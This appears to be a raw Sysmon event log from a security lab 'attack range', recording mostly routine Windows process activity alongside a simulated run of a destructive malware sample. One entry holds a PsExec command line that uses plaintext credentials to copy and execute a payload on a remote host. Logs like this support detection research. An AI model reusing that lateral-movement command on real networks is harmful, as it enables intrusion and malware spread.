11:08:45.050{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-15BD-6216-D804-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15BD-6216-D804-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.051{4F8D34B0-15BD-6216-D804-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.982{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D667691F89C2E21B49CC89090269513,SHA256=8431A39BE7771F3E9FE6B6039AF463F5405A47EEB0A7537B5DC21C85FF7069AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.641{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51552-false10.0.1.12-8000- 23542300x8000000000000000219977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:46.456{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=481E0CEE04DA19A995174150B0C28464,SHA256=E25E28B6610776E7A22FA0B64ECF1DAFA6EC4CBEBB4D4BE4142A13BC4035F133,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000295873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:08:46.698{C8EA50B7-15BE-6216-DB06-000000003802}5628C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000295872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.627{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-15BE-6216-DC06-000000003802}6636C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.627{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-15BE-6216-DC06-000000003802}6636C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.596{C8EA50B7-15BE-6216-DC06-000000003802}66366612C:\Windows\system32\conhost.exe{C8EA50B7-15BE-6216-DB06-000000003802}5628C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.549{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-15BE-6216-DC06-000000003802}6636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.543{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-15BE-6216-DC06-000000003802}6636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.412{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-15BE-6216-DB06-000000003802}5628C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.396{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.396{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.396{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.396{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.396{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-15BE-6216-DB06-000000003802}5628C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.402{C8EA50B7-15BE-6216-DB06-000000003802}5628C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.396{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-15BE-6216-DB06-000000003802}5628C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000295859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:46.396{C8EA50B7-15A7-6216-D706-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000219976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:46.409{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.753{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15BF-6216-DA04-000000003902}1052C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 